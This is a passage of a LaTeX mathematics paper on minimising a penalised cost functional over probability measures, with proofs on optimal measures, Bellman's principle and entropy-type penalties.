\bar{Y}_2^n:=\beta(\dint_0^T\delta_sS_s^\delta f(\bar{Z}_s^n)ds+S_T^\delta f(\bar{Z}_T^n))=\beta \Rc_{0,T}^\delta(\bar{Q}^n)$$ for $n\in\N \cup \{+\infty\}$ that $$\lim\limits_{ n\rightarrow +\infty} \bar{Y}^n_i = \bar{Y}^\infty_i P-a.s. \;\;\textrm{for}\;\; i = 1,2.$$ Since $\bar{Y}^n_2$ is bounded from below, uniformly in $n$ and $\omega$, Fatou’s lemma yields $$\label{ineq4} \E_P[\bar{Y}^\infty_2]\leq \liminf\limits_{n\rightarrow \infty}\E_P[\bar{Y}^n_2].$$ We prove below that we have $$\label{ineq5} \E_P[\bar{Y}^\infty_1]\leq \liminf\limits_{n\rightarrow \infty}\E_P[\bar{Y}^n_1].$$ Plugging (\[ineq4\]) and (\[ineq5\]) into (\[ineq1\]), we obtain $$\Gamma(\bar{Q}^\infty) =\E_P [ \bar{Y}^\infty_1+\bar{Y}^\infty_2 ] \leq \liminf\limits_{n\rightarrow\infty}\Gamma(\bar{Q}^n) \leq \liminf\limits_{n\rightarrow\infty}\Gamma(Q^n)\leq \inf\limits_{Q\in \Qc_f}\Gamma(Q)$$ which proves that $\bar{Q}^\infty $ is indeed optimal.\ It now remains to show that $\E_P[\bar{Y}^\infty_1]\leq \liminf\limits_{n\rightarrow \infty}\E_P[\bar{Y}^n_1].$\ We set for $m\in \N;$ $\tilde{R}_m:=\Uc_{0,T}^\delta \textbf{1}_{\{\Uc_{0,T}^\delta\geq -m\}}.$ Thus for all $n\in \N\cup \{+\infty\}$; $$\bar{Y}^n_1=\bar{Z}_T^n\Uc_{0,T}^\delta=\bar{Z}_T^n\tilde{R}_m+\bar{Z}_T^n\Uc_{0,T}^\delta \textbf{1}_{\{\Uc_{0,T}^\delta< -m\}}.$$ Since $\tilde{R}_m \geq -m$ and $\E_P[\bar{Z}_T^n]=1$, Fatou’s lemma yields : $$\E_P[\bar{Z}_T^\infty\Uc_{0,T}^\delta]\leq \liminf\limits_{n \rightarrow \infty} \E_P[\bar{Z}_T^n\Uc_{0,T}^\delta].$$ Hence $$\begin{split} \E_P[\bar{Y}^\infty_1]&=\E_P[\bar{Y}^\infty_1 \textbf{1}_{\{\Uc_{0,T}^\delta\geq -m\}}]+\E_P[\bar{Y}^\infty_1 \textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}] \\&\leq \liminf\limits_{n \rightarrow \infty} \E_P[\bar{Z}_T^n\tilde{R}_m]+\E_P[\bar{Z}_T^\infty\Uc_{0,T}^\delta \textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}] \\&\leq \liminf\limits_{n \rightarrow \infty} \E_P[\bar{Y}_1^n]+2 \sup\limits_{n\in \N\cup \{\infty\}}\E_P[\bar{Z}_T^n|\Uc_{0,T}^\delta | \textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}]. \end{split}$$ It remains to show that $$\lim\limits_{m\rightarrow +\infty}\sup\limits_{n\in \N\cup \{\infty\}}\E_P[\bar{Z}_T^n|\Uc_{0,T}^\delta| \textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}]=0.$$ However, Lemma \[lemma2\] and Proposition \[cont1\] give for any $n\in \N\cup \{\infty\}$: $$\begin{split} &\E_P[\bar{Z}_T^n|\Uc_{0,T}^\delta| \textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}]=\E_{\bar{Q}^n}[|\Uc_{0,T}^\delta| \textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}] \\&\leq \frac{1}{\gamma}(d(\bar{Q}^n|P)+\kappa)+\frac{1}{\gamma}\E_P[\textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}_T| )] \\& \leq \frac{1}{\gamma}\Big(K\big(1+\Gamma(\bar{Q}^n)\big)+\kappa\Big)+\E_P[\textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}_T| )]). \end{split}$$ By using inequality (\[ineq1\]), we obtain for all $\gamma >0$ $$\begin{split} \sup\limits_{n\in \N\cup \{\infty\}}\E_P[\bar{Z}_T^n|\Uc_{0,T}^\delta| \textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}]& \leq \frac{1}{\gamma}\Big(K\big(1+\Gamma(Q^1)\big)+\kappa\Big) \\&+\frac{1}{\gamma}\E_P[\textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \alpha'|U_T^{\prime }|)]). \end{split}$$\ By the dominated convergence theorem and using the integrability Assumption (**A2**) and since $f^*$ is non negative function, we have $$\lim\limits_{m\rightarrow \infty}\E_P[\textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}_T|)]=0.$$ Then, for all $\gamma >0$ $$\lim\limits_{m\rightarrow +\infty}\sup\limits_{n\in \N\cup \{\infty\}}\E_P[\bar{Z}_T^n|\Uc_{0,T}^\delta| \textbf{1}_{\{\Uc_{0,T}^\delta <-m\}}] \leq \frac{1}{\gamma}(K(1+\Gamma(Q^1))+\k).$$\ By sending $\gamma$ to $+\infty$, we obtain the desired result.\ Our next aim is to prove that the minimal measure $Q^*$ is equivalent to $P.$ For this reason, the following additional assumption is needed: **(A3)** $f$ is differentiable on $(0,+\infty)$ and $f'(0)=\lim\limits_{x\rightarrow 0^+}f'(x)=-\infty.$ We use as in Bordigoni, Matoussi and Schweizer [@BMS05] an adaptation of an argument given by Frittelli [@Fri00], and start ing with an auxiliary result. \[lemme\] Let $Q^0$ and $Q^1$ two elements in $\Qc_f$ with respective densities $Z^0$ and $Z^1.$ Then $$\sup\limits_{0\leq t\leq T}\E_P\Big[\Big(f'(Z_t^0)(Z_t^1-Z_t^0)\Big)^+\Big]\leq d(Q^1|P)+\kappa.$$ Set $Z^x=xZ^1+(1-x)Z^0$ and for $x\in(0,1]$ and fixed $t\in \R,$ $$\label{star}H(x,t):=\frac{1}{x}(f(Z_t^x)-f(Z_t^0)).$$ Since $f$ is strictly convex, the function $x\mapsto H(x,t)$ is non decreasing and consequently $$\begin{split} H(1,t)&\geq\lim\limits_{x\searrow 0}\frac{1}{x}(f(Z_t^x)-f(Z_t^0))=\frac{d}{dx}f(Z_t^x)\mid_{x=0}\\&=f'(Z_t^0)(Z_t^1-Z_t^0). \end{split}$$ From Assumption **(H2)**, $$\label{equa1} \begin{split} f'(Z_t^0)(Z_t^1-Z_t^0)\leq H(1,t)&=f(Z_t^1)-f(Z_t^0)\\&\leq f(Z_t^1)+\kappa \end{split}$$ is obtained. Since $f(Z_t^1)+\k\geq 0,$ then $f'(Z_t^0)(Z_t^1-Z_t^0)^+ \leq f(Z_t^1)+\kappa.$ Replacing in the inequality (\[c1\]) $Z^Q$ by $Z^1$, $$\E_P[f(Z_t^1)]\leq \E_P[f(Z_T^1)]=d(Q^1|P)$$ is obtained. Taking the expectation under $P$ in equation (\[equa1\]) the desired result is obtained. . Under the Assumptions ****, the optimal probability measure $Q^*$ is equivalent to $P.$ \ 1) As in the proof of Lemma \[lemme\], we take $Q^0,Q^1 \in \Qc_f$ , we set $Q^x := xQ^1 +(1-x)Q^0$ for $x\in (0; 1]$ and we denote by $Z^x$ the density process of $Q^x$ with respect to $P$. Then, get $$\begin{split} \frac{1}{x}(\Gamma(Q^x)-\Gamma(Q^0))&= \E_P [(Z^1_T-Z^0_T) \Uc^\delta ] \\&+\frac{1}{x}\beta\E_P[\dint_0^T \delta_sS_s^\delta (f(Z^x_s )-f(Z^0_s ))ds + S_T^\delta (f(Z^x_T )-f(Z^0_T))] \\&= \E_P[(Z^1_T-Z^0_T) \Uc^\delta ] \\&+\beta\E_P[\dint_0^T \delta_sS_s^\delta H(x,s)ds + S_T^\delta H(x,T)]. \end{split}$$ Since $x\mapsto H(x; s)$ is non decreasing and using Assumption **(H2)**, we have $$H(x,s) \leq H(1,s) = f(Z^1_s )-f(Z^0_s ) \leq f(Z^1_s )+\kappa,$$ where the right hand of the last inequality is integrable. Hence monotone convergence Theorem can be used to deduce that $$\label{derivegamma} \begin{split} \frac{d}{dx} \Gamma(Q^x)\mid_{x=0}&= \E_P[(Z^1_T-Z^0_T) \Uc^\delta_{0,T}]+\beta \E_P[\dint_0^T \delta_sS_s^\delta f'(Z_s^0)(Z_s^1-Z_s^0)ds \\&+ S_T^\delta f'(Z_T^0)(Z_T^1-Z_T^0)] \\&:= \E_P[Y_1] + \E_P[Y_2]. \end{split}$$ Under Assumptions (**A1**)-(**A2**) and from inequality (\[convex inequality1\]), we have $Y_1\in L^1(P)$. As in the proof of Lemma \[lemme\], and since $x \mapsto H(x,s)$ is non decreasing , we obtain $$Y_2\leq\int_0^T\delta_sS^\delta_sH(1,s) ds + S^\delta_T H(1,T)\leq \int_0^T\delta_sS^\delta_s(f(Z_s^1)+\k)ds + S^\delta_T (f(Z_T^1)+\k)$$ which is $P$-integrable because $Q^1\in \Qc_f$ . From Lemma \[lemme\] we deduce that $Y_2^+ \in L^1(P)$ and so the right-hand side of (\[derivegamma\]) is well-defined in $[-\infty,+\infty)$.\ 2) Now take $Q^0 = Q^*$ and any $Q^1\in \Qc_f$ which is equivalent to $P$ this is possible since $\Qc_f$ contains $P$. The optimality of $Q^*$ yields $\Gamma(Q^x)-\Gamma(Q^*)\geq0$ for all $x \in (0; 1]$, hence also $$\label{d1} \frac{d}{dx} \Gamma(Q^x)\mid_{x=0}\geq 0.$$ Therefore the right-hand side of (\[derivegamma\]) is nonnegative which implies that $Y_2$ must be in $L^1(P)$. This makes it possible to rearrange terms and rewrite (\[d1\]) by using (\[derivegamma\]) as $$\label{ineq6} \beta \E_P[\dint_0^T \delta_sS_s^\delta f'(Z_s^*)(Z_s^1-Z_s^*)ds+ S_T^\delta f'(Z_T^*)(Z_s^1-Z_T^*)]\geq -\E_P[(Z^1_T-Z^*_T) \Uc^\delta].$$ But the right-hand side of (\[ineq6\]) is $> -\infty.$ So if we have $Q^*\ncong P$, the set $A :=\{Z_T^*=0\}$ satisfies $P[A] > 0$. Since $Q^1\approx P$, we have $Z_T^1>0$, and so $f'(Z_T^*)(Z_T^1-Z_T^*)^-=+\infty$ on $A$. This gives $[f'(Z_T^*)(Z_T^1-Z_T^*)^-]=\infty$ since $Q^1\approx P.$ But since we know from Lemma \[lemme\] that $[f'(Z_T^*)(Z_T^1-Z_T^*)^+] \in L^1(P)$, we then conclude that $\E_P[f'(Z_T^*)(Z_T^1-Z_T^*)]=-\infty$ and this gives a contradiction to (\[ineq6\]). Therefore $Q^*\thickapprox P.$ Bellman optimality principle ---------------------------- In this section we establish the martingale optimality principle which is a direct consequence of Theorems 1.15 , 1.17 and 1.21 in El Karoui [@ELK81]. For this reason, some notations are introduced. Let $\Sc$ denote the set of all $\Fc$-stopping times $\tau$ with values in $[0,T]$ and $\Dc$ the space of all density processes $Z^Q$ with $Q\in \Qc_f$ . We define $$\Dc(Q,\tau):=\{Z^{Q'}\in \Dc; Q=Q'\; \textrm{on} \;\Fc_\tau \}$$ $$\Gamma(\tau,Q):= \E_Q[c(.,Q)|\Fc_\tau]$$ and the minimal conditional cost at time $\tau$ , $$J(\tau,Q) := Q\;\;\textrm{-}\underset{Q'\in \Dc(Q,\tau)}{\essinf}\Gamma(\tau,Q').$$ Then (\[min1\]) can be reformulated to $$\label{remin} \textrm{find} \inf\limits_{Q\in \Qc_f}\Gamma(Q) = \inf\limits_{Q\in \Qc_f}\E_Q[c(.,Q)] = \E_P [J(0;Q)]$$ by using the dynamic programming principle and the fact that $Q=P$ on $\Fc_0$ for every $Q\in \Qc_f$ .\ In the following, the Bellman martingale optimality principle is given. 1\. The family $\{J(\tau, Q)|\tau \in \mathcal{S},Q \in Q_f\}$ is a submartingale system.\ 2. $Q^*\in Q_f$ is optimal $\Leftrightarrow$ $\{J(\tau, Q^*)|\tau \in \mathcal{S}\}$ is a martingale system.\ 3. For all $Q \in Q_f$ there is an adapted RCLL process $J^Q=(J_t^Q)_{0\leq t \leq T}$ which is a right closed $Q$-submartingale such that : $J_{\tau}^Q=J(\tau, Q)\;\; Q$-a.s for each stopping time $\tau.$\ The proof is given in the appendix. Moreover, we should like to apply Theorems 1.15, 1.17, 1.21 in El Karoui [@ELK81]. These results require that: 1. \[condition1\] $c\geq 0$ or $\displaystyle \inf_{Q'\in \Dc(Q,t)}E_{Q'}[|c(\cdot,\ Q')|]<\infty$ for all $\tau\in \Sc$ and $Q\in \mathcal{Q}_{f}$, 2. The space $\mathcal{D}$ is compatible and stable under bifurcation, 3. The cost functional is coherent. In the proof of the Bellman Optimality principle, condition (\[condition1\]) ensures that $J(\tau,Q)\in L^1(Q)$ for each $\tau\in \Sc.$ In this case we prove such a result directly (see Lemma \[lemma3\]). Class of Consistent time penalty ================================ In this section we assume that filtration $(\Fc_t)_{0\leq t \leq T}$ is generated by a one dimensional Brownian motion $W.$ Then for every measure $Q\ll P$ on $ \Fc_T $ there is a predictable process $ (\eta_t)_{0 \leq t \leq T} $ such that $ \int_0^T \| \eta_t \|^2 dt<+ \infty \; Q.a.s $ and the density process of $Q$ with respect to $ P $ is an RCLL martingale $Z^Q=(Z^Q_t)_{0 \leq t \leq T} $ given by: $$\label{representation}Z_t^ Q = \Ec(\int_0^t\eta_udW_u) \,\; Q.p.s, \forall t \in [0,T].$$ where $\Ec(M)_t = \exp (M_t -\frac{1}{2}\langle M \rangle_t)$ denotes the stochastic exponential of a continuous local martingale $M$. We introduce a consistent time penalty given by: $$\gamma_t(Q) = E_Q [\int_t^T h (\eta_s) ds | \Fc_t]$$ where $ h: \R^d \rightarrow [0, + \infty] $ is a convex function, proper and lower semi-continuous function such that $ h (0) \equiv 0 $. We also assume that there are two positive constants $ \kappa_1 $ and $ \kappa_2 $ satisfying: $$h(x) \geq \kappa_1 \| x\|^2 - \kappa_2.$$ The penalty term is defined by $$\label{penalty definition ctc} \Rc_{t, T}^\delta(Q^\eta)= \dint_t^ T \delta_s \frac{S_s^\delta}{S_t ^ \delta} (\int_t^s h(\eta_u) du) ds + \frac{S_T^\delta} {S_t^\delta} \int_t^T h (\eta_u) du, \; \forall \, 0 \leq t \leq T$$ for $ Q \ll P $ on $\Fc_T^W .$ As in the case of $f$-divergence penalty, the following optimization problem has to be solved: $$\label{min} \textrm{minimize the functional} \, Q^\eta \mapsto \Gamma(Q^\eta):=\E_{Q^{\eta}}[c (.,Q^\eta)]$$ over an appropriate class of probability measures $ Q^\eta \ll P. $ For each probability measure $Q^\eta $ on $ (\Omega, \Fc) $, the penalty function is defined: $$\label{penalty} \gamma_t(Q^\eta):=\left\{\begin{array}{cc} \E_{Q^\eta} [\dint_t ^T h(\eta_s)ds | \Fc_t] & \textrm {if}\, \, Q^\eta \ll P \,\, \textrm {on} \, \Fc_T \\ + \infty & \textrm{otherwise} \end{array} \right..$$ We note $\Qc_f^c $ the space of all probability measures $ Q^\eta $ on $(\Omega, \Fc) $ such that $Q^\eta \ll P$ on $\Fc_T$ and $\gamma_0 (Q^\eta)< +\infty$ and $ \Qc^{c,e}_f:=\{Q^\eta \in \Qc_f | Q \approx P \, \textrm {on} \, \Fc_T \} $. \[rem2\] 1. We note that $\Qc_f^{c,e}$ is a non empty set because $ P \in \Qc_f^{c,e}.$ 2. The particular case of $ h(x)= \frac{1}{2}|x|^2 $ corresponds to the entropic penalty. Indeed $$\begin{split} H(Q^\eta|P)&= \E_{Q^\eta} [\log(\frac{dQ^\eta}{dP})] \\ &=\E_{Q^\eta} [\int_0^T\eta_u dW_u-\frac{1}{2}\int_0^T|\eta_u|^2 du] \end{split}$$ Since $(\int_0^.\eta_u dW_u)$ is a local martingale under $P$, then by the Girsanov theorem $(\int_0^.\eta_u dW_u)-\int_0^.|\eta_u|^2 du$ is a local martingale under $Q^\eta$ and so $$\begin{split} H(Q^\eta|P) &=\E_{Q^\eta} [\int_0^T\eta_u dW_u-\int_0^T|\eta_u|^2 du+\frac{1}{2}\int_0^T|\eta_u|^2 du] \\&=\E_{Q^\eta} [\frac{1}{2}\int_0^T|\eta_u|^2 du]=\gamma_0(Q^\eta). \end{split}$$ 3. For a general function $h$ we have for all $Q^\eta \in \Qc_f^c$, $$\label{estimation entropy} H(Q^\eta | P) \leq\frac{1}{2\kappa_1}\gamma_0 (Q^\eta) + \frac{T\kappa_2}{2\kappa_1}.$$ Indeed: $$\label{ineqalityentropy} \begin{split} H(Q^\eta|P) = \E_{Q^\eta}[\frac{1}{2} \dint_0^T |\eta_s|^2 ds] & \leq \E_P [\frac {1}{2\kappa_1}(\dint_0^T (h(|\eta_s|) + \kappa_2) ds)] \\ & \leq \E_{Q^\eta} [\frac{1}{2\kappa_1}(\dint_0^T (h (|\eta_s|)ds) + \frac{T\kappa_2}{2 \kappa_1}] \\ & = \frac{1}{2\kappa_1}\gamma_0 (Q^\eta) + \frac{T\kappa_2}{2\kappa_1} \end{split}$$\ In particular $H(Q^\eta|P)$ is finite for all $Q^\eta \in \Qc_f^c.$ To guarantee the well-posedness of the problem (\[min\]), it is necessary to replace the Assumption (**A2**) by :\ **()** the cost process $U$ belongs to $D_1 ^{\exp}$ and the terminal target $\bar{U}$ is in $L^{\exp}$. \[integrability of U\] Under Assumption **()** , we have $$\label{integrability} \lambda \int_ {0}^{T} |U_s|ds + \mu |\bar{U}_T|\in L^{\exp},\;\; \textrm{for all}\;\; (\lambda, \mu) \in \mathbb{R}^2_{+}.$$ Indeed, since $ x \mapsto \exp(x) $ is convex , we have $$\begin{split} &\mathbb{E}_{P} [\exp (\lambda \int_{0}^{T} |U_s|ds + \mu |\bar{U}_T|)] \\ & =\mathbb{E}_{P} [\exp (\frac{1}{2} \times 2 \lambda \int_{0}^{T} |U_s|ds + \frac{1}{2}\times 2 \mu |\bar{U}_T|)] \\ & \leq \mathbb{E}_{P} [\frac{1}{2} \exp (2 \lambda \int_{0}^{T} |U_s| ds) + \frac{1}{2}\exp (2\mu |\bar{U}_T|)] \\ & = \frac{1}{2} \mathbb{E}_{P} [\exp (2 \lambda \int_{0}^{T} | U_s|ds)] + \frac{1}{2} \mathbb{E}_{P} [\exp (2 \mu |\bar{U}_T|)] \end{split}$$ which is finite by assumption **()** . Existence for an optimal model ------------------------------ The main result of this section is to prove the existence of a unique probability $ Q^{\eta*} $ that minimizes the functional $Q^\eta\mapsto \Gamma(Q^\eta)$ in all probability $ Q^\eta \in \Qc_f^c $. We begin this section by giving some estimates for $\Gamma(Q^\eta)$ for all $Q^\eta \in \Qc_f^c.$ \[prop3.1\] Under assumption **(A1)-(A’2)**, we have for all $Q^\eta \in \Qc_f^c:$ 1. $c(.,Q^\eta)\in L^1(Q^\eta).$ 2. $\Gamma (Q^\eta) \leq C(1+\gamma_0 (Q^\eta))$ for some positive constant $C$ which depends only on $\alpha ,\bar{\alpha} ,\beta ,\delta ,T,U,\bar{U}.$ In particular $ \Gamma (Q^\eta) $ is well defined and finite for all $ Q^\eta\in \Qc_f^c.$ 1. As in Proposition \[prop1\], we have $Z^\eta_TR \in L^1(P)$ i.e $R\in L^1(Q^\eta).$ In addition, $$\begin{split} &\vert\dint_0^T\delta_s S_s^\delta (\int_0^sh(\eta_u)du)ds + S_T^\delta\int_0^T h(\eta_s)ds \vert \\&\leq \dint_0^T\Vert \delta \Vert_\infty \Big(\int_0^T h(\eta_u)du\Big) ds +\int_0^T h(\eta_s)ds \\&\leq \Big( \Vert \delta \Vert_\infty T+1\Big)\int_0^T h(\eta_s)ds \in L^1(Q^\eta). \end{split}$$ 2. From inequality (\[convex inequality1\]) with $f(x)=x\log x$, we have: $$\begin{split} \Gamma(Q^\eta) & \leq \E_P[Z^\eta_TR] + \beta \E_{Q^{\eta}} [\dint_0^T\delta_s S_s^\delta (\int_0^sh(\eta_u)du)ds + S_T^\delta\int_0^T h(\eta_u)du] \\ & \leq \E_P[Z^\eta_T\log Z^{\eta}_T + e^{-1} e^R] + \beta(\parallel\delta\parallel_\infty T+1) \E_Q^{\eta} [\int_0^T h(\eta_u)] \\ & \leq H(Q^\eta|P) + e^{-1} \E_P[e^R] + \beta (\parallel\delta\parallel_\infty T+1) \gamma_0 (Q^\eta). \end{split}$$ From inequality (\[estimation entropy\]), we have $$\Gamma(Q^\eta)\leq (\frac{1}{2\kappa_1} + \beta (\parallel\delta\parallel_\infty T+1)) \gamma_0 (Q^\eta) + e^{-1}\E_P[e^R] + \frac{T\kappa_2}{2\kappa_1}.$$ We take $ C: = \max (e^{-1} E_P [e^R] + \dfrac {t \kappa_2} {2 \kappa_1}, \dfrac{1}{2 \kappa_1} + \beta (\parallel\delta\parallel_\infty T+1)) $ which is finite, then the result follows. The following proposition gives a lower bound for our criterion $\Gamma(Q^\eta)$ for all $ Q^\eta\in \Qc_f^c.$ \[cont\] Under the assumptions **(A1)-(A’2)**, there is a positive constant $ K $ such that for all $ Q^\eta \in \Qc_f $ $$\gamma_0 (Q^\eta) \leq K (1 + \Gamma (Q^\eta)).$$ In particular $\inf\limits_{Q^\eta \in \Qc_f} \Gamma(Q^\eta)>-\infty .$ For $ Q^\eta \in \Qc_f $, we denote by $ Z^\eta $ its density process. Since $h$ takes values on $[0, +\infty]$, we have $$\label{ineq8} \begin{split} \beta E_{Q^\eta} [\dint_0^T \delta_s S_s^\delta (\int_0 ^s h(\eta_u)du) ds + S_T^\delta \int_0^T h(\eta_u)du] &\geq \beta E_{Q^\eta} [S_T ^ \delta \int_0^T h(\eta_u)du]\\& \geq \beta e ^ {- \|\delta \|_{\infty} T} \gamma_0 (Q^\eta). \end{split}$$ Moreover, since $0 \leq S^\delta \leq 1 $, we have: $$\label{ineq9} \E_{Q^\eta} [\Uc_{0,T}^\delta]\geq -\E_{Q^\eta} [R] =- \E_P[Z_T^\eta R].$$ From inequality (\[convex inequality2\]) where $f(x)=x\log x,$ and as a consequence $f^*(\lambda x)= e^{\lambda x -1}$ we have $$\label{convexinequality} xy \leq \frac{1}{\lambda} (y \ln y + e^{-1} e^{\lambda x} )\;\; \textrm{for all} \;\; (x,y,\lambda) \in \R \times \R^*_+ \times \R^*$$ We get: $$\begin{split} \E_\mathbb{P}[Z_T^\eta R] & \leq \frac{1}{\lambda} \E_P[Z_T^\eta \log Z_T^\eta +e^{-1} e^{\lambda R}] = \frac {1}{\lambda} H(Q^\eta| P) + \frac {e^{-1}} {\lambda} \E_P [e^{\lambda R}]. \end{split}$$ From inequality (\[estimation entropy\]), we deduce that $$\label{ineq10} \E_P[Z_T^\eta R]\leq \frac{1}{2\lambda \kappa_1} \gamma_0 (Q^\eta) + \frac{T\kappa_2}{2 \lambda \kappa_1} + \frac {e^{-1}} {\lambda} \E_P [e^ {\lambda R}].$$ From the definition of $\Gamma(Q^\eta)$, it can be deduced $$\Gamma(Q^\eta)=E_P[Z_T\Uc_{0,T}]+\beta E_{Q^\eta} [\dint_0^T \delta_s S_s^\delta (\int_0 ^s h(\eta_u)du) ds + S_T^\delta \int_0^T h(\eta_u)du].$$ From (\[ineq8\]),(\[ineq9\]) and (\[ineq10\]), we obtain $$\begin{split} \Gamma (Q^\eta) & \geq \beta e^{-\| \delta \|_{\infty} T} \gamma_0 (Q^\eta) - \frac{1}{2\lambda \kappa_1} \gamma_0 (Q ^\eta) - \frac {T \kappa_2} {2 \lambda \kappa_1} - \frac{e^{-1}}{\lambda} \E_P [e^{\lambda R}] \\ & = (\beta e^{-\| \delta \|_{\infty} T} - \frac{1}{2 \lambda \kappa_1}) \gamma_0 (Q^\eta)-\dfrac {T \kappa_2} {2 \lambda \kappa_1} - \dfrac {e^{-1}} {\lambda} \E_P [e^{\lambda R}]. \end{split}$$ By choosing $\lambda> 0 $ large enough, there exists $\mu>0$ such that $ \beta e^{-\| \delta \|_{\infty}T} - \dfrac{1}{2\lambda \kappa_1} \geq \mu. $ From Remark \[integrability of U\], we have $\E_P [e ^ {\lambda R}]$ is finite. Then, by taking $ K:=\frac{1}{\mu} \max(1, \dfrac{T \kappa_2}{2 \lambda \kappa_1} + \dfrac {e^{-1}} {\lambda} \E_P [e^{\lambda R }]),$ the desired result is obtained. By combining the previous Proposition and the inequality (\[estimation entropy\]) we obtain the following result. \[controlentropy\] Under the assumptions **(A1)-(A’2)**, there is a positive constant $ K'$ such that for all $ Q^\eta \in \Qc_f^c $ $$H(Q^\eta|P) \leq K' (1 + \Gamma (Q^\eta)).$$ To prove the existence of the minimizer probability measure, we need the following technical estimate. \[lemma1\] For all $\gamma> 0$ and any $A \in \Fc_T $ we have: $$\label{ineq11} \E_{Q^\eta} [|\Uc_{0,T}^\delta| \textbf{1}_A] \leq \frac {\gamma_0(Q^\eta)}{2\lambda\kappa_1} + \frac{T\kappa_2}{2\lambda\kappa_1} + \frac{e^{-1}} {\lambda} + \frac {e^{-1}} {\lambda} \E_P [\textbf{1}_A \exp (\lambda \alpha \int_{0}^{T} |U_s| ds+\lambda \bar{\alpha}|\bar{U}_T|)].$$ From Remark \[integrability of U\], we have $R\in L^{\exp}.$ By using the inequality (\[convexinequality\]), we obtain $$\begin{split} Z_T^\eta |\Uc_{0, T}^\delta| \textbf{1}_A & \leq Z_T^\eta (\alpha \int_{0}^{T} |U_s| ds + \bar{\alpha}|\bar{U}_T|) \textbf{1}_A \\ & \leq \frac{1}{\lambda} [Z_T^\eta \ln (Z_T^\eta) + e^{-1}\exp (\lambda \alpha \int_{0}^{T} |U_s |ds + \lambda \bar{\alpha}|\bar{U}_T|)] \textbf{1}_A \\ & \leq \frac{1}{\lambda} [Z_T^\eta \ln (Z_T^\eta) + e^{-1}] + \frac{e^{-1}}{\lambda}\textbf{1}_A \exp(\lambda\alpha \int_{0}^{T}|U_s|ds +\lambda\bar{\alpha}|\bar{U}_T|). \end{split}$$ By taking the expectation with respect to $P$ and using inequality (\[ineqalityentropy\]) we get $$\E_{Q^{\eta}} [|\Uc_{0, T}^\delta|\textbf{1}_A] \leq \frac{1}{2 \lambda\kappa_1} \gamma_0 (Q^\eta) + \frac{T\kappa_2} {2\lambda \kappa_1} + \frac{e^{-1}} {\lambda} + \frac {e^{-1}} {\lambda} \E_P [\textbf{1}_A \exp (\lambda\alpha\int_{0}^{T}|U_s|ds + \lambda \bar{\alpha}|\bar{U}_T|)],$$ and so inequality (\[ineq11\]) is proved. \[convexity of Gamma\] The functional $Q^\eta \mapsto \Gamma (Q^\eta) $ is convex. By the product derivatives formula, we have $$\frac{d}{ds} (S_s^\delta (\int_0^sh(\eta_u)du)) =-\delta_sS_s^\delta\int_0^sh(\eta_u)du + S_sh(\eta_s).$$ By integrating between $0$ and $T$ we get: $$\label{ineq12}\dint_0^T \delta_sS_s^\delta (\int_0^sh(\eta_u)du)ds + S_T^\delta \int_0^T h(\eta_u)du = \int_0^T S_s^\delta h(\eta_s)ds.$$ Fix $\lambda \in(0,1)$ and $ Q^\eta $ and $ Q^{\eta'} $ two distinct elements of $\Qc_f.$\ Let $ Q = \lambda Q^\eta + (1-\lambda) Q^{\eta'} $ and $L_t=\E_P[\frac{dQ}{dP}|\Fc_t].$ Using It$\hat{\textrm{o}}$’s formula, we get $ L_t=\Ec(q.W)_t $ where $(q_t)_{0\leq t \leq T}$ is defined by $$q_t=\frac{\lambda \eta L_t^\eta+(1-\lambda)\eta'L_t^{\eta'}}{\lambda L_t^\eta+(1-\lambda)L_t^{\eta'}}\textbf{1}_{\{\lambda L_t^\eta+(1-\lambda)L_t^{\eta'}>0\}}\;\; dt\otimes dP\;\textrm{a.e.}\;\;\; t\in [0,T].$$\ From the definition of the penalty term in $\Gamma$, we have $$\begin{split} \Rc_{0,T}(Q)&=\E_Q\Big[\dint_0^T\delta_sS_s^\delta (\int_0^s h(q_u)du)ds+S_T^\delta\int_0^T h(q_u)du \Big] \\&=\E_Q\Big[\dint_0^TS_s^\delta h(\frac{\lambda \eta L_s^\eta+(1-\lambda)\eta'L_s^{\eta'}}{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}}\textbf{1}_{\{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}>0\}})ds\Big] \\&\leq \E_Q\Big[\dint_0^TS_s^\delta h(\frac{\lambda \eta L_s^\eta+(1-\lambda)\eta'L_s^{\eta'}}{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}})\textbf{1}_{\{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}>0\}}ds\Big], \end{split}$$ where the second equality is deduced from $(\ref{ineq12}).$ By the convexity of $h$ we have: $$\begin{split} &\E_Q\Big[\dint_0^T\delta_sS_s^\delta (\int_0^s h(q_u)du)ds+S_T^\delta\int_0^T h(q_u)du\Big] \\& \leq \E_Q\Big[\dint_0^TS_s^\delta (\frac{\lambda L^\eta_s}{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}} h(\eta_s)+\frac{(1-\lambda) L_s^{\eta'}}{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}} h(\eta'_s))\textbf{1}_{\{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}>0\}}ds\Big] \\&=\E_P\Big[\dint_0^T (\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}) S_s^\delta (\frac{\lambda L^\eta_s}{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}} h(\eta_s)\\ & +\frac{(1-\lambda) L_s^{\eta'}}{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}} h(\eta'_s))\textbf{1}_{\{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}>0\}} ds\Big] \\&=\lambda \E_{Q^\eta}\Big[\dint_0^T S_s^\delta 